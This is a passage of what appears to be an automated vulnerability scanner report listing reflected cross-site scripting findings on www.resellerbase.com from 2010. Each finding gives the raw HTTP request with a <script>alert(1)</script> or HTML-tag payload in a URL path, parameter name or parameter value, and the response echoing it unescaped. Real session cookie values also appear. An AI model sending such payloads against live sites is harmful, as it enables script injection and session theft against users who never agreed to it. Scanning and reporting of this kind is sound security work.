The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf790<script>alert(1)</script>51768e5a41a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/rating.php?bf790<script>alert(1)</script>51768e5a41a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.php?bf790<script>alert(1)</script>51768e5a41a=1 was not found on this server.</p>
...[SNIP]...

2.1128. http://www.resellerbase.com/detail/14/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f2727<script>alert(1)</script>82e2f25e80868e11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/14/rating.php/f2727<script>alert(1)</script>82e2f25e80868e11d?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.php/f2727<script>alert(1)</script>82e2f25e80868e11d?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1129. http://www.resellerbase.com/detail/14/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4dd2e<script>alert(1)</script>892878db225 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4dd2e<script>alert(1)</script>892878db225/14/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4dd2e<script>alert(1)</script>892878db225/14/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1130. http://www.resellerbase.com/detail/14/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7d43<script>alert(1)</script>e62b1daed5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14c7d43<script>alert(1)</script>e62b1daed5e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14c7d43<script>alert(1)</script>e62b1daed5e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1131. http://www.resellerbase.com/detail/14/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71148<script>alert(1)</script>d51bf8b874f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/search.php71148<script>alert(1)</script>d51bf8b874f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php71148<script>alert(1)</script>d51bf8b874f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1132. http://www.resellerbase.com/detail/14/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 85b04<a>0355537e803 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search85b04<a>0355537e803&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...&Submit3=Search85b04<a>0355537e803&opt=2 was not found on this server.</p>
...[SNIP]...

2.1133. http://www.resellerbase.com/detail/14/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ccfcc<a>623ab8a52f1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/search.php?keyword=search...ccfcc<a>623ab8a52f1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...ccfcc<a>623ab8a52f1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1134. http://www.resellerbase.com/detail/14/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c9812<script>alert(1)</script>f726689fba1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search&opt=2&c9812<script>alert(1)</script>f726689fba1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...&Submit3=Search&opt=2&c9812<script>alert(1)</script>f726689fba1=1 was not found on this server.</p>
...[SNIP]...

2.1135. http://www.resellerbase.com/detail/14/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 26287<a>8242ec36020 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search&opt=226287<a>8242ec36020 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...&Submit3=Search&opt=226287<a>8242ec36020 was not found on this server.</p>
...[SNIP]...

2.1136. http://www.resellerbase.com/detail/14/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c947c<script>alert(1)</script>2116aedca07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc947c<script>alert(1)</script>2116aedca07/14/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc947c<script>alert(1)</script>2116aedca07/14/themes/ was not found on this server.</p>
...[SNIP]...

2.1137. http://www.resellerbase.com/detail/14/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7571<script>alert(1)</script>bff27da5d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14d7571<script>alert(1)</script>bff27da5d8c/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14d7571<script>alert(1)</script>bff27da5d8c/themes/ was not found on this server.</p>
...[SNIP]...

2.1138. http://www.resellerbase.com/detail/14/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f769c<script>alert(1)</script>59ed39f3266 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesf769c<script>alert(1)</script>59ed39f3266/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesf769c<script>alert(1)</script>59ed39f3266/ was not found on this server.</p>
...[SNIP]...

2.1139. http://www.resellerbase.com/detail/14/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8f32e<script>alert(1)</script>4a9ae7d5019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/?8f32e<script>alert(1)</script>4a9ae7d5019=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/?8f32e<script>alert(1)</script>4a9ae7d5019=1 was not found on this server.</p>
...[SNIP]...

2.1140. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b94f5<script>alert(1)</script>6c3eeed11a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb94f5<script>alert(1)</script>6c3eeed11a7/14/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb94f5<script>alert(1)</script>6c3eeed11a7/14/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1141. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5da5<script>alert(1)</script>221e90d01ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14b5da5<script>alert(1)</script>221e90d01ae/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14b5da5<script>alert(1)</script>221e90d01ae/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1142. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8642f<script>alert(1)</script>3b003d81e5c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes8642f<script>alert(1)</script>3b003d81e5c/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes8642f<script>alert(1)</script>3b003d81e5c/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1143. http://www.resellerbase.com/detail/14/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd12c<script>alert(1)</script>b5a7bd20753 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmoscd12c<script>alert(1)</script>b5a7bd20753/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmoscd12c<script>alert(1)</script>b5a7bd20753/ was not found on this server.</p>
...[SNIP]...

2.1144. http://www.resellerbase.com/detail/14/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fe4a2<script>alert(1)</script>7b9f45e14f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/?fe4a2<script>alert(1)</script>7b9f45e14f3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/?fe4a2<script>alert(1)</script>7b9f45e14f3=1 was not found on this server.</p>
...[SNIP]...

2.1145. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload decc5<script>alert(1)</script>1913fe75109 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildecc5<script>alert(1)</script>1913fe75109/14/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildecc5<script>alert(1)</script>1913fe75109/14/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1146. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7db8<script>alert(1)</script>83376a0740b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14c7db8<script>alert(1)</script>83376a0740b/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
